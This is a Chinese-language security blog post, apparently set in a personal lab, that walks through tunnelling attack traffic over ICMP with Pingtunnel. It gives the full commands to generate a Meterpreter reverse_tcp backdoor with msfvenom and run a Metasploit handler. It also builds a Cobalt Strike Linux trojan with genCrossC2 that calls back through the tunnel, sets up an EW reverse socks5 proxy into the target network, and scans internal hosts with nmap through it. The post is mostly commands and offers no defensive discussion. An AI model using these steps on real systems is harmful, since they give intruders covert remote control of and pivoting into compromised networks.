<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    
    <title>
        Pingtunnel Manua |
        
        SuperHua is Blog</title>
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta name="description" content="Pingtunnel  下载地址：https:&#x2F;&#x2F;github.com&#x2F;esrrhs&#x2F;pingtunnel   EW 下载地址：https:&#x2F;&#x2F;github.com&#x2F;idlefire&#x2F;ew   Metasploit上线首先在Kali主机启动服务端 .&#x2F;pingtunnel -type server -noprint 1 -nolog 1    服务端启动之后再到客户端将客户端的4444端口转发到K">
<meta property="og:type" content="article">
<meta property="og:title" content="Pingtunnel Manua">
<meta property="og:url" content="https://superhuabigcake.github.io/2023/11/01/Pingtunnel-Manua/index.html">
<meta property="og:site_name" content="SuperHua is Blog">
<meta property="og:description" content="Pingtunnel  下载地址：https:&#x2F;&#x2F;github.com&#x2F;esrrhs&#x2F;pingtunnel   EW 下载地址：https:&#x2F;&#x2F;github.com&#x2F;idlefire&#x2F;ew   Metasploit上线首先在Kali主机启动服务端 .&#x2F;pingtunnel -type server -noprint 1 -nolog 1    服务端启动之后再到客户端将客户端的4444端口转发到K">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://superhuabigcake.github.io/2023/11/01/Pingtunnel-Manua/image-20231101110833386.png">
<meta property="og:image" content="https://superhuabigcake.github.io/2023/11/01/Pingtunnel-Manua/image-20231101111051317.png">
<meta property="og:image" content="https://superhuabigcake.github.io/2023/11/01/Pingtunnel-Manua/image-20231101111501967.png">
<meta property="og:image" content="https://superhuabigcake.github.io/2023/11/01/Pingtunnel-Manua/image-20231101111749787.png">
<meta property="og:image" content="https://superhuabigcake.github.io/2023/11/01/Pingtunnel-Manua/image-20231101112223482.png">
<meta property="og:image" content="https://superhuabigcake.github.io/2023/11/01/Pingtunnel-Manua/image-20231101134219947.png">
<meta property="og:image" content="https://superhuabigcake.github.io/2023/11/01/Pingtunnel-Manua/image-20231101134657914.png">
<meta property="og:image" content="https://superhuabigcake.github.io/2023/11/01/Pingtunnel-Manua/image-20231101135927488.png">
<meta property="og:image" content="https://superhuabigcake.github.io/2023/11/01/Pingtunnel-Manua/image-20231101140012626.png">
<meta property="og:image" content="https://superhuabigcake.github.io/2023/11/01/Pingtunnel-Manua/image-20231101141650552.png">
<meta property="og:image" content="https://superhuabigcake.github.io/2023/11/01/Pingtunnel-Manua/image-20231101140731576.png">
<meta property="og:image" content="https://superhuabigcake.github.io/2023/11/01/Pingtunnel-Manua/image-20231101141024256.png">
<meta property="og:image" content="https://superhuabigcake.github.io/2023/11/01/Pingtunnel-Manua/image-20231101142043356.png">
<meta property="og:image" content="https://superhuabigcake.github.io/2023/11/01/Pingtunnel-Manua/image-20231101142620878.png">
<meta property="og:image" content="https://superhuabigcake.github.io/2023/11/01/Pingtunnel-Manua/image-20231101142751321.png">
<meta property="og:image" content="https://superhuabigcake.github.io/2023/11/01/Pingtunnel-Manua/image-20231101142838932.png">
<meta property="og:image" content="https://superhuabigcake.github.io/2023/11/01/Pingtunnel-Manua/image-20231101144126443.png">
<meta property="og:image" content="https://superhuabigcake.github.io/2023/11/01/Pingtunnel-Manua/image-20231101144449692.png">
<meta property="article:published_time" content="2023-11-01T03:04:25.000Z">
<meta property="article:modified_time" content="2023-11-01T06:47:58.133Z">
<meta property="article:author" content="John Doe">
<meta property="article:tag" content="Tools">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://superhuabigcake.github.io/2023/11/01/Pingtunnel-Manua/image-20231101110833386.png">
    
    
    
        
            <link rel="stylesheet" href="https://superhuabigcake.github.io/css/markdown.css">
        
            <link rel="stylesheet" href="https://superhuabigcake.github.io/css/july.css">
        
    
<meta name="generator" content="Hexo 6.3.0"></head>
<body>

<div id="banner-outer" class="hidden">
    <div id="banner-image" style="background-image: url()"></div>
    <img src="https://s1.ax1x.com/2023/06/18/pClXj4s.jpg" id="avatar">
</div>

<div id="menu-outer">
    <div id="menu-inner">
        
            <a class="false" href="https://superhuabigcake.github.io/index.html">Home</a>
        
            <a class="false" href="https://superhuabigcake.github.io/archives/index.html">Archives</a>
        
            <a class="false" href="https://superhuabigcake.github.io/about/index.html">About</a>
        
    </div>
</div>

<div id="content-outer" class="container">
    <div id="content-inner">
        <article id="post">
    <h1 id="post-title">Pingtunnel Manua</h1>
    <time id="post-date" datetime="2023-11-01T03:04:25.000Z">
        November 01, 2023
    </time>
    <div id="post-content" class="markdown-body">
        <h1 id="Pingtunnel"><a href="#Pingtunnel" class="headerlink" title="Pingtunnel"></a>Pingtunnel</h1><blockquote>
<p> 下载地址：<a target="_blank" rel="noopener" href="https://github.com/esrrhs/pingtunnel">https://github.com/esrrhs/pingtunnel</a></p>
</blockquote>
<p><img src="/2023/11/01/Pingtunnel-Manua/image-20231101110833386.png" alt="image-20231101110833386"></p>
<h1 id="EW"><a href="#EW" class="headerlink" title="EW"></a>EW</h1><blockquote>
<p>下载地址：<a target="_blank" rel="noopener" href="https://github.com/idlefire/ew">https://github.com/idlefire/ew</a></p>
</blockquote>
<p><img src="/2023/11/01/Pingtunnel-Manua/image-20231101111051317.png" alt="image-20231101111051317"></p>
<h1 id="Metasploit上线"><a href="#Metasploit上线" class="headerlink" title="Metasploit上线"></a>Metasploit上线</h1><p>首先在Kali主机启动服务端</p>
<pre><code class="bash">./pingtunnel -type server -noprint 1 -nolog 1 
</code></pre>
<p><img src="/2023/11/01/Pingtunnel-Manua/image-20231101111501967.png" alt="image-20231101111501967"></p>
<p>服务端启动之后再到客户端将客户端的<code>4444</code>端口转发到<code>Kali</code>的<code>4444</code>端口</p>
<pre><code class="bash">./pingtunnel -type client -l :4444 -s 192.168.1.107 -t 192.168.1.107:4444 -tcp 1 -noprint 1 -nolog 1
</code></pre>
<p>其中 <code>192.168.1.107</code> 是 <code>Kali</code> 主机的 <code>IP</code> 地址</p>
<p><img src="/2023/11/01/Pingtunnel-Manua/image-20231101111749787.png" alt="image-20231101111749787"></p>
<p>此时 <code>Kali</code> 的 <code>4444</code> 端口就相当于目标主机的 <code>4444</code> 端口</p>
<p>使用 <code>Msfvenom</code> 生成一个监听本地 <code>4444</code> 端口的后门文件</p>
<pre><code class="bash">msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f elf -o ./tcp.elf
</code></pre>
<p><img src="/2023/11/01/Pingtunnel-Manua/image-20231101112223482.png" alt="image-20231101112223482"></p>
<p>使用 <code>Metasploit</code> 进行监听</p>
<pre><code class="bash">msf6 &gt; use exploit/multi/handler 
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) &gt; set payload linux/x64/meterpreter/reverse_tcp
payload =&gt; linux/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) &gt; set LHOST 192.168.1.107
LHOST =&gt; 192.168.1.107
msf6 exploit(multi/handler) &gt; set LPORT 4444
LPORT =&gt; 4444
msf6 exploit(multi/handler) &gt; exploit 

[*] Started reverse TCP handler on 192.168.1.107:4444
</code></pre>
<p><img src="/2023/11/01/Pingtunnel-Manua/image-20231101134219947.png" alt="image-20231101134219947"></p>
<p>运行后门文件之后成功上线，查看端口可以看到是 <code>192.168.1.107:4444</code>  -&gt;  <code>192.168.1.107:59518</code> ，本地的 <code>4444</code> 连接本地的 <code>59518</code> </p>
<h1 id="CobaltStrike上线"><a href="#CobaltStrike上线" class="headerlink" title="CobaltStrike上线"></a>CobaltStrike上线</h1><p>服务端还是老样子设置为服务器</p>
<pre><code class="bash">./pingtunnel -type server -noprint 1 -nolog 1 -key 123456
</code></pre>
<p><img src="/2023/11/01/Pingtunnel-Manua/image-20231101134657914.png" alt="image-20231101134657914"></p>
<p>在目标机器换一个端口进行使用，防止端口被占用</p>
<pre><code class="bash">./pingtunnel -type client -l :10087 -s 192.168.1.107 -t 192.168.1.107:10086 -tcp 1 -noprint 1 -nolog 1 -key 123456
</code></pre>
<p><img src="/2023/11/01/Pingtunnel-Manua/image-20231101135927488.png" alt="image-20231101135927488"></p>
<p>接下来需要设置 <code>CobaltStrike</code> 的监听器</p>
<p>首先是一个正常的上线监听器，其次是一个监听本地的 <code>10087</code> 端口的 <code>TCP</code> 监听器</p>
<p><img src="/2023/11/01/Pingtunnel-Manua/image-20231101140012626.png" alt="image-20231101140012626"></p>
<p>因为我们这里上线的是 <code>Linux</code> ，所以还需要使用 <code>genCrossC2</code> 制作一个 <code>Linux</code> 木马</p>
<pre><code class="bash">genCrossC2.Win.exe 127.0.0.1 10087 cobaltstrike.beacon_keys null Linux x64 ./a.out
</code></pre>
<p>上线地址就填写本地的 <code>10087</code> 端口：<code>127.0.0.1:10087</code> -&gt; <code>192.168.0.106:10086</code></p>
<p><img src="/2023/11/01/Pingtunnel-Manua/image-20231101141650552.png" alt="image-20231101141650552"></p>
<p>在目标机器运行生成的木马，成功上线，并且监听器为 <code>HTTPS</code> 说明 <code>ICMP</code> 隧道生效了</p>
<p><img src="/2023/11/01/Pingtunnel-Manua/image-20231101140731576.png" alt="image-20231101140731576"></p>
<p>成功通过 <code>Pingtunnel</code> 上线 <code>CobaltStrike</code> </p>
<p>如果是 <code>Windows</code> 生成 <code>Stagless</code> 的应用程序，监听器选择 <code>Beacon TCP</code> 即可</p>
<p><img src="/2023/11/01/Pingtunnel-Manua/image-20231101141024256.png" alt="image-20231101141024256"></p>
<p>在目标主机运行即可上线，这里不做演示</p>
<h1 id="搭建Socks5"><a href="#搭建Socks5" class="headerlink" title="搭建Socks5"></a>搭建Socks5</h1><p>使用 <code>Pingtunnel</code>  +  <code>EW</code> 搭建 <code>socks5</code> 代理</p>
<p>首先Kali需要使用EW搭建等待连接的 <code>Socks5</code> 代理，这里使用 <code>ew</code> 工具进行演示</p>
<pre><code class="bash">./ew_for_linux64 -s rcsocks -l 10086 -e 8898
</code></pre>
<p>监听自己的 <code>8898</code> 端口并且从 <code>10086</code> 端口出去</p>
<p>然后再启动 <code>Pingtunnel</code> 工具进行监听</p>
<pre><code class="bash">./pingtunnel -type server -noprint 1 -nolog 1 -key 123456
</code></pre>
<p><img src="/2023/11/01/Pingtunnel-Manua/image-20231101142043356.png" alt="image-20231101142043356"></p>
<p>此时服务端已经设置完成，接下来需要去客户端进行操作</p>
<p>首先使用 <code>Pingtunnel</code> 工具将目标机器的 <code>9999</code> 端口转发到Kali监听的 <code>8898</code> 端口</p>
<pre><code class="bash">./pingtunnel -type client -l :9999 -s 192.168.1.107 -t 192.168.1.107:8898 -tcp 1 -noprint 1 -nolog 1 -key 123456
</code></pre>
<p><img src="/2023/11/01/Pingtunnel-Manua/image-20231101142620878.png" alt="image-20231101142620878"></p>
<p>此时目标机器的 <code>9999</code> 端口已经转发到 <code>Kali</code> 监听的 <code>8898</code> 端口了，但是此时还没有与Kali的ew监听端口建立连接</p>
<p>还需要使用ew建立本地的9999端口socks代理</p>
<pre><code class="bash">./ew_for_linux64 -s rssocks -d 127.0.0.1 -e 9999
</code></pre>
<p><img src="/2023/11/01/Pingtunnel-Manua/image-20231101142751321.png" alt="image-20231101142751321"></p>
<p>此时Kali已经接收到来自目标主机的请求并建立连接，输出OK</p>
<p><img src="/2023/11/01/Pingtunnel-Manua/image-20231101142838932.png" alt="image-20231101142838932"></p>
<p>此时可以连接Kali的10086端口，就相当于连接到目标主机的网络环境</p>
<p><img src="/2023/11/01/Pingtunnel-Manua/image-20231101144126443.png" alt="image-20231101144126443"></p>
<p>也可以使用nmap通过这个代理对内网进行扫描</p>
<pre><code class="bash">proxychains nmap -Pn -sT 192.168.168.128
</code></pre>
<p><img src="/2023/11/01/Pingtunnel-Manua/image-20231101144449692.png" alt="image-20231101144449692"></p>

    </div>
</article>

<div id="paginator">
    
</div>

    </div>
</div>

<div id="bottom-outer">
    <div id="bottom-inner">
        2019-2024 John Doe 
    </div>
</div>

<div id="to-top">
    <i class="iconfont icon-up"></i>
</div>


    
        <script src="https://superhuabigcake.github.io/js/jquery-3.4.1.min.js"></script>
    
        <script src="https://superhuabigcake.github.io/js/highlight-9.13.1.min.js"></script>
    
        <script src="https://superhuabigcake.github.io/js/transition.js"></script>
    
        <script src="https://superhuabigcake.github.io/js/smooth-scroll.min.js"></script>
    



    <script>
      $(function () {
        $('#banner-outer').addClass('fade-out')
        $('#menu-outer').addClass('fade-show')

        $('pre').each(function (i, block) {
          hljs.highlightBlock(block);
        });
      })
    </script>


<script>
  $(function () {
    $(window).scroll(function () {
      if ($(window).scrollTop() > 150) {
        $("#to-top").fadeIn();
      } else {
        $("#to-top").fadeOut();
      }
    });
    $("#to-top").click(function () {
      $("body,html").animate({scrollTop: 0}, 500);
      return false;
    })
  })
</script>
</body>
</html>
